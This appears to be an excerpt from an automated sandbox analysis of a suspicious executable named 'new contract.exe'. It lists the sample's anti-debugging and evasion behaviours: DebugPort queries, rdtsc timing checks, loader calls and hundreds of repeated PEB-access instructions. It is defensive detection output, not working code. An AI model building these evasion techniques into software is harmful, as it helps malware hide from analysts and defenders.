Source: C:\Users\user\Desktop\new contract.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\new contract.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0040ACE0 LdrLoadDll, 2_2_0040ACE0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4164 mov eax, dword ptr fs:[00000030h] 2_2_016F4164
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4164 mov eax, dword ptr fs:[00000030h] 2_2_016F4164
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h] 2_2_016B4144
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h] 2_2_016B4144
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B4144 mov ecx, dword ptr fs:[00000030h] 2_2_016B4144
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h] 2_2_016B4144
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h] 2_2_016B4144
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B8158 mov eax, dword ptr fs:[00000030h] 2_2_016B8158
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626154 mov eax, dword ptr fs:[00000030h] 2_2_01626154
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626154 mov eax, dword ptr fs:[00000030h] 2_2_01626154
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161C156 mov eax, dword ptr fs:[00000030h] 2_2_0161C156
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01650124 mov eax, dword ptr fs:[00000030h] 2_2_01650124
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h] 2_2_016CE10E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CA118 mov ecx, dword ptr fs:[00000030h] 2_2_016CA118
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CA118 mov eax, dword ptr fs:[00000030h] 2_2_016CA118
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CA118 mov eax, dword ptr fs:[00000030h] 2_2_016CA118
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CA118 mov eax, dword ptr fs:[00000030h] 2_2_016CA118
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E0115 mov eax, dword ptr fs:[00000030h] 2_2_016E0115
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F61E5 mov eax, dword ptr fs:[00000030h] 2_2_016F61E5
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016501F8 mov eax, dword ptr fs:[00000030h] 2_2_016501F8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E61C3 mov eax, dword ptr fs:[00000030h] 2_2_016E61C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E61C3 mov eax, dword ptr fs:[00000030h] 2_2_016E61C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0169E1D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0169E1D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0169E1D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0169E1D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0169E1D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01660185 mov eax, dword ptr fs:[00000030h] 2_2_01660185
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DC188 mov eax, dword ptr fs:[00000030h] 2_2_016DC188
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DC188 mov eax, dword ptr fs:[00000030h] 2_2_016DC188
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C4180 mov eax, dword ptr fs:[00000030h] 2_2_016C4180
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C4180 mov eax, dword ptr fs:[00000030h] 2_2_016C4180
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A019F mov eax, dword ptr fs:[00000030h] 2_2_016A019F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A019F mov eax, dword ptr fs:[00000030h] 2_2_016A019F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A019F mov eax, dword ptr fs:[00000030h] 2_2_016A019F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A019F mov eax, dword ptr fs:[00000030h] 2_2_016A019F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161A197 mov eax, dword ptr fs:[00000030h] 2_2_0161A197
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161A197 mov eax, dword ptr fs:[00000030h] 2_2_0161A197
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161A197 mov eax, dword ptr fs:[00000030h] 2_2_0161A197
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164C073 mov eax, dword ptr fs:[00000030h] 2_2_0164C073
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01622050 mov eax, dword ptr fs:[00000030h] 2_2_01622050
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A6050 mov eax, dword ptr fs:[00000030h] 2_2_016A6050
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161A020 mov eax, dword ptr fs:[00000030h] 2_2_0161A020
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161C020 mov eax, dword ptr fs:[00000030h] 2_2_0161C020
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6030 mov eax, dword ptr fs:[00000030h] 2_2_016B6030
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A4000 mov ecx, dword ptr fs:[00000030h] 2_2_016A4000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h] 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h] 2_2_0163E016
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h] 2_2_0163E016
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h] 2_2_0163E016
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h] 2_2_0163E016
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0161A0E3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A60E0 mov eax, dword ptr fs:[00000030h] 2_2_016A60E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016280E9 mov eax, dword ptr fs:[00000030h] 2_2_016280E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0161C0F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016620F0 mov ecx, dword ptr fs:[00000030h] 2_2_016620F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A20DE mov eax, dword ptr fs:[00000030h] 2_2_016A20DE
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016180A0 mov eax, dword ptr fs:[00000030h] 2_2_016180A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B80A8 mov eax, dword ptr fs:[00000030h] 2_2_016B80A8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E60B8 mov eax, dword ptr fs:[00000030h] 2_2_016E60B8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E60B8 mov ecx, dword ptr fs:[00000030h] 2_2_016E60B8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162208A mov eax, dword ptr fs:[00000030h] 2_2_0162208A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C437C mov eax, dword ptr fs:[00000030h] 2_2_016C437C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F634F mov eax, dword ptr fs:[00000030h] 2_2_016F634F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h] 2_2_016A2349
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A035C mov eax, dword ptr fs:[00000030h] 2_2_016A035C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A035C mov eax, dword ptr fs:[00000030h] 2_2_016A035C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A035C mov eax, dword ptr fs:[00000030h] 2_2_016A035C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A035C mov ecx, dword ptr fs:[00000030h] 2_2_016A035C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A035C mov eax, dword ptr fs:[00000030h] 2_2_016A035C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A035C mov eax, dword ptr fs:[00000030h] 2_2_016A035C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EA352 mov eax, dword ptr fs:[00000030h] 2_2_016EA352
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C8350 mov ecx, dword ptr fs:[00000030h] 2_2_016C8350
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h] 2_2_016F8324
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F8324 mov ecx, dword ptr fs:[00000030h] 2_2_016F8324
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h] 2_2_016F8324
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h] 2_2_016F8324
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h] 2_2_0165A30B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h] 2_2_0165A30B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h] 2_2_0165A30B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161C310 mov ecx, dword ptr fs:[00000030h] 2_2_0161C310
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01640310 mov ecx, dword ptr fs:[00000030h] 2_2_01640310
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h] 2_2_016303E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0163E3F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0163E3F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0163E3F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016563FF mov eax, dword ptr fs:[00000030h] 2_2_016563FF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DC3CD mov eax, dword ptr fs:[00000030h] 2_2_016DC3CD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0162A3C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0162A3C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0162A3C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0162A3C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0162A3C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0162A3C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h] 2_2_016283C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h] 2_2_016283C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h] 2_2_016283C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h] 2_2_016283C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A63C0 mov eax, dword ptr fs:[00000030h] 2_2_016A63C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h] 2_2_016CE3DB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h] 2_2_016CE3DB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE3DB mov ecx, dword ptr fs:[00000030h] 2_2_016CE3DB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h] 2_2_016CE3DB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C43D4 mov eax, dword ptr fs:[00000030h] 2_2_016C43D4
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C43D4 mov eax, dword ptr fs:[00000030h] 2_2_016C43D4
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h] 2_2_0161E388
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h] 2_2_0161E388
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h] 2_2_0161E388
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164438F mov eax, dword ptr fs:[00000030h] 2_2_0164438F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164438F mov eax, dword ptr fs:[00000030h] 2_2_0164438F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618397 mov eax, dword ptr fs:[00000030h] 2_2_01618397
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618397 mov eax, dword ptr fs:[00000030h] 2_2_01618397
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618397 mov eax, dword ptr fs:[00000030h] 2_2_01618397
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624260 mov eax, dword ptr fs:[00000030h] 2_2_01624260
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624260 mov eax, dword ptr fs:[00000030h] 2_2_01624260
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624260 mov eax, dword ptr fs:[00000030h] 2_2_01624260
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161826B mov eax, dword ptr fs:[00000030h] 2_2_0161826B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h] 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A8243 mov eax, dword ptr fs:[00000030h] 2_2_016A8243
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A8243 mov ecx, dword ptr fs:[00000030h] 2_2_016A8243
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161A250 mov eax, dword ptr fs:[00000030h] 2_2_0161A250
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F625D mov eax, dword ptr fs:[00000030h] 2_2_016F625D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01626259 mov eax, dword ptr fs:[00000030h] 2_2_01626259
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DA250 mov eax, dword ptr fs:[00000030h] 2_2_016DA250
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DA250 mov eax, dword ptr fs:[00000030h] 2_2_016DA250
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161823B mov eax, dword ptr fs:[00000030h] 2_2_0161823B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h] 2_2_016302E1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h] 2_2_016302E1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h] 2_2_016302E1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0162A2C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0162A2C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0162A2C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0162A2C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0162A2C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F62D6 mov eax, dword ptr fs:[00000030h] 2_2_016F62D6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016302A0 mov eax, dword ptr fs:[00000030h] 2_2_016302A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016302A0 mov eax, dword ptr fs:[00000030h] 2_2_016302A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h] 2_2_016B62A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B62A0 mov ecx, dword ptr fs:[00000030h] 2_2_016B62A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h] 2_2_016B62A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h] 2_2_016B62A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h] 2_2_016B62A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h] 2_2_016B62A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E284 mov eax, dword ptr fs:[00000030h] 2_2_0165E284
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E284 mov eax, dword ptr fs:[00000030h] 2_2_0165E284
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h] 2_2_016A0283
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h] 2_2_016A0283
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h] 2_2_016A0283
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165656A mov eax, dword ptr fs:[00000030h] 2_2_0165656A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165656A mov eax, dword ptr fs:[00000030h] 2_2_0165656A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165656A mov eax, dword ptr fs:[00000030h] 2_2_0165656A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628550 mov eax, dword ptr fs:[00000030h] 2_2_01628550
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01628550 mov eax, dword ptr fs:[00000030h] 2_2_01628550
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 mov eax, dword ptr fs:[00000030h] 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h] 2_2_0164E53E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6500 mov eax, dword ptr fs:[00000030h] 2_2_016B6500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h] 2_2_016F4500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016225E0 mov eax, dword ptr fs:[00000030h] 2_2_016225E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0164E5E7
